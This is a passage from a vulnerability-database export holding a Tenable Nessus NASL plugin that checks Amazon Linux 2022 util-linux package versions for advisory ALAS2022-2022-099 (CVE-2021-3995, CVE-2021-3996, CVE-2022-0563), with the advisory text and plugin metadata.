{'reference':'libfdisk-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / libblkid-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-15T15:07:32", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-099 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an INPUTRC environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-09-06T00:00:00", "type": "nessus", "title": "Amazon Linux 2022 : (ALAS2022-2022-099)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-10-12T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", "p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user", "p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2022"], "id": "AL2022_ALAS2022-2022-099.NASL", "href": "https://www.tenable.com/plugins/nessus/164772", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2022 Security Advisory ALAS2022-2022-099.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164772);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/12\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"Amazon Linux 2022 : (ALAS2022-2022-099)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2022 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-099 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an INPUTRC environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2022/ALAS-2022-099.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-0563.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update --releasever=2022.0.20220628 util-linux' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2022\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"-2022\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2022\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 